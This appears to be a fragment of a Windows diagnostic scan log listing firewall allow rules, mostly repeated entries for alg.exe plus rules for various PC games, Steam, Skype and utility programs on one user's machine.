FirewallRules: [{991D0F57-1FA8-4E8F-9380-E7194DE16B68}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{FC45BCA2-DB52-45FA-81E3-5B93EBC179A7}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AAC19015-0629-43B4-802E-F737975C2F3E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{46D722F1-4D6B-4B6C-94E6-D95B0208DF0D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A8E386FA-A947-4EBD-8BA5-D51EDA841759}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AFAC73C3-A5D3-411B-91FF-D473B0B9B3F5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{406AC703-2022-4C1B-B0EF-14479F9AB35B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{45D555D2-6EB2-48D8-BA56-622BE85264F6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{F7A7DC57-0BCA-40B6-AE52-B81A4F00340B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DF79CCE7-D27A-4E00-8B1B-2644344FE3B4}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{BC075D15-8A6B-434A-873D-23FB429342D4}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{64292204-2017-4C93-A620-779179629E34}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{62781B2C-D391-4E1D-902B-3108B65750EE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D455894D-1196-42EC-A6D0-93C58BA2FB8F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4538B374-E986-47E9-8721-10188D3F9829}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6439378C-ACBB-4774-B26A-A4DE5E10B17D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EE5721D6-84DF-49E0-9A22-3954C1FBA1C5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{689F28CF-0F5A-4E91-A893-8D1AA04C6D52}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{E17C9F2E-356E-485A-92F8-333E3E95F7E3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B91E471E-7429-4037-AA46-2EF9C2F36045}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{78C32E52-BFE1-448D-AC64-CDA6231D107B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CA675389-C6B5-4FF5-85E9-E22ECDC02361}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B0651ECF-218D-412C-99AB-987BFD3B46F6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EEB51221-050F-4677-97FB-5E078F5230CD}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3B4ECF17-69E5-450D-BF97-24D405A718EC}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2CA90B71-006C-4407-A78C-9B42725D3D15}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{76185150-5DA1-4DCA-B7D5-CFFE67CBDC6D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{09437C84-DD3F-4C1D-A527-9A64B8C3C6DE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{00E16651-B36D-470D-A169-8D7F122039B5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EA30B70F-98D3-43DC-BA54-886D4A1AC749}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9681AAC8-A87F-498A-B4DE-E9109FF84E16}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{375AD8DB-AB06-4CFF-AEC2-AE72D94BB7D9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CA161FDB-2B01-4E7F-A394-1612076E9D1C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1F3EE75A-285D-43A3-9A39-4E798F657A9F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6B4E7CF9-8642-4DFD-8C7B-A3DD1CD0BAB8}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7719801A-5EC1-40CA-AF7C-C9F9BFC3CC09}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6E2F20A5-3739-40FE-A703-424F30A1DF78}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EB1F5960-3864-4087-8E55-9CE86D603A66}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9863874D-E81F-4509-982B-2072FED8FA10}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{53874B5F-3C78-4ABD-9192-6842711F17FE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{38087112-493B-4CDE-9634-D1DD22AF718E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C5EAA576-7A79-438A-B6DC-607AF96C854A}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{42A7C93B-5F36-48A3-8648-1E6C500F3E93}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{66642769-37D1-4366-8A11-BFC1A7D35A55}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6218D665-6CA1-45C3-A4FC-2BD972C69099}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{67E10703-C741-4C91-B350-AEA43F2ECF37}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3754096A-D0A4-4C33-B1F3-BC8A3BE674E9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{BA10E43B-F87E-4A61-85DE-0D412A26EAC3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{BA28310F-F94C-43A8-BED5-D3D21D6C5F8B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8BB5E751-862C-4828-ACE5-AB878F38327E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{5DFDA1E1-B834-47A5-B0E3-C7351EA6625C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{30A30051-D178-4A80-BFE1-EEFB11A86802}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4D88FE5E-BC3F-4278-BE6F-0CAFFF67C382}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C0784789-93E4-4900-9729-F616EB25F21D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{823DFFD6-E542-49A1-8403-2B72F9320455}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{196F2A08-26CA-485E-BCB3-43D525B68310}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C0E11366-7FC3-44CA-AE24-BB494BF50F0C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{48BEBF60-25CC-4A9B-9597-D31DD78F523B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CA9D13FC-9AF1-49AC-8726-AF3A33BA7BDE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{57B7E2CE-C345-4244-9E0E-1D1B9EE98E11}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DEE9ED93-1FB8-4157-9B55-235395B91C0F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9562DE8F-4C96-4B89-BF3B-56C19DEED665}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{28E1B578-69BF-4E9C-9304-9242BCB8D067}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D8080A3F-0275-40D3-BE7F-D1A04E069AB9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DFD79F1A-E9C8-4C38-95D7-C2FE6F2E6FCC}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4848D1DD-C843-45A2-8B27-F7D4B4CB13A3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D919BD13-8AC4-4FCD-A58E-5A52E614D229}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{07A18EE1-2E6C-4D9F-A164-BE72879387DE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D0272FD1-7EB9-4F71-B63F-07312068F1EA}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7F3BD7AD-00EF-4887-AF50-5C76CA74173C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DFA7766F-A3B4-4C29-9FD3-E11C5CC0E771}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{15E8E8DD-904B-4711-B5D2-9145F970F109}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{767339C8-EA44-4B26-A9B4-6CAAA9DD6E2E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{38308754-5F62-47C1-A2EA-4EBE7F003A87}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CEA472F9-3557-4C63-AF00-AE27DF5FC897}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [UDP Query User{19082667-24B8-4376-A7AA-D52C39EBC355}E:\aezia's game\call of duty - black ops\blackops.exe] => (Allow) E:\aezia's game\call of duty - black ops\blackops.exe
FirewallRules: [TCP Query User{F19DE709-2D0E-46FE-BD53-1EDC0ECBD0F5}E:\aezia's game\call of duty - black ops\blackops.exe] => (Allow) E:\aezia's game\call of duty - black ops\blackops.exe
FirewallRules: [{3BCC9538-74B5-418C-AEB1-07F919429CB2}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{967801FA-B52D-4561-9D7B-95E8157445E6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CDEB2DAF-E188-41EB-9F48-BEFED8B991F9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{28275656-D921-41AE-B3DC-EB27A47169B1}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{246730D1-16B1-40FC-8359-F0B112F0BF93}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2F135B79-9BB2-42D6-987A-1BE2493BA78F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8BDEB471-9EC9-48E4-BBE0-CC3189546B11}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{077B8755-7745-4B6B-A213-5A4A47C0B225}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4B080BC1-4E17-410E-8E11-823099A0F2D0}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{FD389367-4946-4CC5-B0A9-2048889C0E99}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{344E5B43-DC74-428E-9A57-2D0A39391E97}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{32739ABC-9F68-4BFC-9B6F-367A8B26E243}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9A34CA05-150D-491C-A536-6E8E6851CE63}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{321C5857-2BFB-4400-B84E-B67E5A26E19C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8B4A04D6-9645-4298-A161-D389E4C89B4E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3938EA39-BA51-4EB9-ACFC-44294D27FDEA}] => (Allow) C:\Program Files (x86)\Origin Games\Need for Speed™ Most Wanted\NFS13.exe
FirewallRules: [{671EC08B-749C-43BE-BABF-F34498639724}] => (Allow) C:\Program Files (x86)\Origin Games\Need for Speed™ Most Wanted\NFS13.exe
FirewallRules: [{39AE9233-47F4-43C4-9394-877DB50C6B4C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2BEF3299-11B3-497E-BCDB-B6C3444E4E1D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{49235FED-ABE0-4740-9788-7BDDD77C1502}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{E4548ECF-EDB5-46F0-9E06-7285EC55D59B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D21F8DBF-A45D-4D89-ABCC-34DD94095E1A}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3ADA85E9-AE8A-440B-BE0F-F2F17354C902}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2FF6CD33-886F-489B-8EF0-B9079F9DF44C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A6A9DAB4-00F5-4044-B95F-6345B749A79F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{F59EB6EE-533E-4A05-93C7-C0D543AC4560}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B7C21979-6A60-4E19-8A26-CA8E934E7956}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DF09BE84-A531-4E40-BF9F-469C9B3C76ED}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B9904C9B-8867-4B2E-B4F0-F5BDC1A9FBE6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{027A93C3-A132-495D-8E55-1EEA3C9A0E1A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{51B91CC4-EB4E-4B39-90FF-C46F31E2CAD8}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{DC143665-2841-44B5-9EB7-94D8EFDE18BC}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7AEF5958-656F-4E7B-8681-D1F6826BE832}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{F2709376-A78D-41CD-A3B5-7F0703430F48}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{72D91B83-3A6A-45C7-8585-ACE286FEA70A}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{051343D2-3731-45D4-B729-9A62C2112B93}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{014880E8-E926-4F0B-85CF-47371027AC38}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{98678345-4DA3-4C9F-A128-1202F5A977B0}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{5A7958B8-B274-4300-8A37-CFECFD3A71BD}] => (Allow) E:\Aezia's Game\Call Of Duty Modern Warfare\iw3mp.exe
FirewallRules: [{9B01F0C6-268A-4EAE-9716-E1073F63BFBE}] => (Allow) E:\Aezia's Game\Call Of Duty Modern Warfare\iw3mp.exe
FirewallRules: [{16D61675-D219-44B1-A131-DB54594D6472}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9AB99274-A77A-43A5-9AAF-BECACAE6E617}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9A5C6DE0-AF71-4D59-8321-AB592F342033}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{FF236F8F-F488-41B9-9F9A-00999F587BA3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{F282B264-BE1D-4B20-8828-3C745E1B8879}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{0501BBC5-E8A3-4308-BC33-20782F25F652}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D664ECCC-0E3B-481D-9B03-1BAAB58D0A63}] => (Allow) E:\Aezia's Game\Just Cause 2\JustCause2.exe
FirewallRules: [{4F6F1CEE-C69F-4BD9-9E49-AD901922ACCC}] => (Allow) E:\Aezia's Game\Just Cause 2\JustCause2.exe
FirewallRules: [{E106E5D2-1CA1-4775-9188-F2B0ECF325D2}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2DC213BB-1BD0-4EA2-8F64-AAF4D229EDB1}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C4CB26E8-FC1B-4843-8CF0-FD3F7B5362A3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{49108EDF-B7AB-45D2-BB1C-4F7FD0B83D6E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8C09A6E7-34D0-4460-BDA0-C1D0A58CB4C7}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2DCAEDE3-111D-40C5-BBBA-540CEA121955}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{80D72B7F-4D51-4B48-A163-ECCFDE522BC2}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{17659157-C584-4C03-AEF7-2795E77F7DF9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{228ABC87-996C-4EF3-9111-656971C355DA}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{9D909198-9D91-4030-8A0D-32D1B6D77636}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AB4C461A-C5DF-4C70-B299-DA36F38A9D0D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{63DA4F9A-D51B-4439-8848-6DF6141DDE1A}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{AE92C178-61F0-4B41-A8B1-58486A2DD843}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D419B822-AB55-499D-A0AA-5CBA1672A99C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CDDCB9A1-0CC1-4165-912E-275C1D75B2F0}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{D87F50B4-0608-4921-BF5E-3450A2FF2A71}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{37A4A8C0-C7D7-449C-8F55-94E759F4832F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{8EF0E1E1-2271-40CC-8FE6-B297997CAD0F}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{30EB2D41-20D9-4BE1-8050-C1F4E3C27440}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{473975C6-4D70-47D7-8478-3FEFE4F2C8F9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1A48F8B7-89CD-4197-A6B1-824CCBA064E5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{87FFF93A-7F0B-445D-84B1-096C695CC361}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{CD2092D6-810E-4A59-8EF5-86531A75A3B3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{56400AE9-27FF-4DD4-B145-B2149B8E2381}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3BA11120-2A69-455B-AC60-86EE8594FB8E}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7ADA40A8-33C9-45CB-BEBE-E6017B0A20F6}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C6019768-AD1D-4335-AA10-EDB3602649D2}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{E03F49E2-0823-429B-97F7-27E1A40B9ED3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{970E3A92-7734-4F19-AD7C-FF143E60DB49}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{937A7B17-186F-4840-99EE-BFD940D83A57}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1FC83FE0-DEB8-4DE3-84BA-C9647F030739}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3DDAC0DC-B4A1-4435-BBA3-4E4B3E2FF583}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{EB31CD41-E26C-4A49-9864-06190B2BAA62}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{227E22CD-29F1-4406-A6CC-7097BF0F8467}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{5CEBDA08-EF3B-4C25-BFA6-1C73A57757D9}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{22A12CC8-B4E9-44FA-8062-05888961F844}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{B727A9A4-F280-4CF8-BA7A-D3C2978CB662}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{E905CC00-4BD4-4D0C-B808-BF9FC48EA25B}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{5C45EEA8-06A9-4616-B8DD-364D3BD0C450}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{4A6E33B7-B1C4-46B8-943D-9F66D9085C97}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C0F7B0A0-EE14-4E65-8C0A-6272FA84824D}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7708CE41-6839-4374-8532-D7277AF4B71C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7C274D0B-D474-4663-93B2-9914CEC0FE04}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{7EEF0DD3-D8DC-4109-A457-4C1F2AEF1009}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{3B4162FA-0DBC-4DB7-8BAA-01B1EABB337B}] => (Allow) C:\Program Files (x86)\ASUS\PC Link\PCLinkService.exe
FirewallRules: [UDP Query User{1AB46E89-FAEE-4E26-9603-F564FFE1187B}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe
FirewallRules: [TCP Query User{784BAE50-9A40-4037-B3C7-ABF57C3821AD}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe
FirewallRules: [{71537B66-B535-4CFD-B987-8A029E889D58}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A680296E-3D8A-48E4-8C3C-32965363665C}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{156ED0C8-C254-427E-86F8-CEF3FA99E3A5}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{6DDE5B79-5580-41E7-AD44-D8446C64FACD}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{35168DA4-5474-4FF5-9AA3-28F766EBF0EE}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{1D8BD25E-78A9-4CDE-8AED-CC5F6BF30FAA}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{C7B20503-46B2-4C01-AABD-CEEB1DBEE4BD}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{35EEBF3F-8B27-49F7-A6DA-F886D627CA53}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [UDP Query User{3B700086-B0F5-47F6-A1A2-F4B08C0EFA2E}C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe
FirewallRules: [TCP Query User{B7EC860D-A299-46C7-A894-324566236CBB}C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe
FirewallRules: [{7015A928-C832-4EF8-98B4-9C971793BA11}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{0F8505D4-2869-4682-A8EC-17E8AA888602}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{2B0D4A0D-C279-4247-AB3E-2D71ABC75BF1}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [UDP Query User{E36B864B-C0E7-4232-8558-717726ADD541}C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwawmp.exe] => (Allow) C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwawmp.exe
FirewallRules: [TCP Query User{8A5B77D0-558D-44F0-99F1-F686A6135CE5}C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwawmp.exe] => (Allow) C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwawmp.exe
FirewallRules: [UDP Query User{5466594D-B6DE-48DF-B28F-EA3B4B6CC878}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{3F2C3A10-C907-4367-9268-2D8372952A20}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{B54676D6-DF1E-4344-BF1C-740E7D25878E}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe
FirewallRules: [TCP Query User{A55B0AEC-527D-4892-94F7-5B073AC6A1AD}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe
FirewallRules: [{A86B85A0-4E67-4B57-A00C-93C6A749C10D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{63C1EC08-7977-4ECC-954D-A7619A7153DE}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [UDP Query User{E0376A0A-9A6A-4F91-BFB8-313812F511E9}C:\users\aezia aznan\downloads\resident evil revelations 2\dying light\human.fall.flat.v1.1.2\human.fall.flat.v1.1.2\human.exe] => (Allow) C:\users\aezia aznan\downloads\resident evil revelations 2\dying light\human.fall.flat.v1.1.2\human.fall.flat.v1.1.2\human.exe
FirewallRules: [TCP Query User{13F2E030-AF22-4403-964B-6749B6C96840}C:\users\aezia aznan\downloads\resident evil revelations 2\dying light\human.fall.flat.v1.1.2\human.fall.flat.v1.1.2\human.exe] => (Allow) C:\users\aezia aznan\downloads\resident evil revelations 2\dying light\human.fall.flat.v1.1.2\human.fall.flat.v1.1.2\human.exe
FirewallRules: [{B3CD11BC-F999-4AF3-B1B3-3516DE8E9BFE}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\AssassinsCreedRevelations.exe
FirewallRules: [{7F5B392C-25EF-4605-80D9-FF87DF1EB887}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\AssassinsCreedRevelations.exe
FirewallRules: [{6CA515E6-E9DC-4877-8EAC-CEE2F26653FD}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\ACRMP.exe
FirewallRules: [{1A61F270-97FF-490A-8B74-71EAA887100D}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\ACRMP.exe
FirewallRules: [{0FE1AD92-ED5C-4D26-94FB-715F8140FE4D}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\ACRSP.exe
FirewallRules: [{9112FF7F-9C2E-4F1D-84D5-9B5CBF1C5BFC}] => (Allow) C:\Program Files (x86)\Ubisoft\Assassin's Creed Revelations\ACRSP.exe
FirewallRules: [UDP Query User{44913227-695C-4845-B329-839A6365B992}C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwaw.exe] => (Allow) C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwaw.exe
FirewallRules: [TCP Query User{807062EF-D522-4536-AAC1-FF930DDC1250}C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwaw.exe] => (Allow) C:\program files (x86)\r.g. mechanics\call of duty - world at war\codwaw.exe
FirewallRules: [{0835796E-59E1-4773-AE08-1F5CA9CFA340}] => (Allow) C:\Program Files (x86)\Baidu WiFiHotspot\WifiHotspot.exe
FirewallRules: [{DA05559F-80CE-4C8A-8AD0-15743CFA6BC0}] => (Allow) C:\Program Files (x86)\Baidu WiFiHotspot\WifiHotspot.exe
FirewallRules: [{FAAE5D37-46B1-4367-B859-5453FCC0992D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\diriptide\DeadIslandGame_x86_rwdi.exe
FirewallRules: [{A611BEF8-380A-409F-8501-85AC79A769AE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\diriptide\DeadIslandGame_x86_rwdi.exe
FirewallRules: [UDP Query User{8C035CF4-5D06-4422-B61A-3A36D4417AC4}C:\program files (x86)\capcom\resident evil 5\re5dx9.exe] => (Allow) C:\program files (x86)\capcom\resident evil 5\re5dx9.exe
FirewallRules: [TCP Query User{2163F200-D661-46D7-B437-4FD1585D6FA4}C:\program files (x86)\capcom\resident evil 5\re5dx9.exe] => (Allow) C:\program files (x86)\capcom\resident evil 5\re5dx9.exe
FirewallRules: [UDP Query User{9EC9076B-42C7-4716-974B-021FAAE2D46B}C:\program files (x86)\capcom\resident evil 5\re5dx10.exe] => (Allow) C:\program files (x86)\capcom\resident evil 5\re5dx10.exe
FirewallRules: [TCP Query User{F2FB9F0E-3013-41F4-9BEC-1D47F620078C}C:\program files (x86)\capcom\resident evil 5\re5dx10.exe] => (Allow) C:\program files (x86)\capcom\resident evil 5\re5dx10.exe
FirewallRules: [{F175ABDB-6B03-4E6D-9648-89E28B513994}] => (Allow) C:\Program Files (x86)\Capcom\RESIDENT EVIL 5\RE5DX10.EXE
FirewallRules: [{3AFA54D7-D4CD-4190-A920-CA376CE71700}] => (Allow) C:\Program Files (x86)\Capcom\RESIDENT EVIL 5\RE5DX10.EXE
FirewallRules: [{23719FE1-81F5-495C-B123-BBF6135FAC84}] => (Allow) C:\Program Files (x86)\Capcom\RESIDENT EVIL 5\RE5DX9.EXE
FirewallRules: [{322D6D0D-FE7E-46FD-B08E-5688087E52E9}] => (Allow) C:\Program Files (x86)\Capcom\RESIDENT EVIL 5\RE5DX9.EXE
FirewallRules: [UDP Query User{5E714BCB-F367-4208-9340-75A4B1C12DF0}C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe
FirewallRules: [TCP Query User{BD11A925-2E8C-4F30-8C75-648640C8CE8E}C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\red barrels\outlast\binaries\win64\olgame.exe
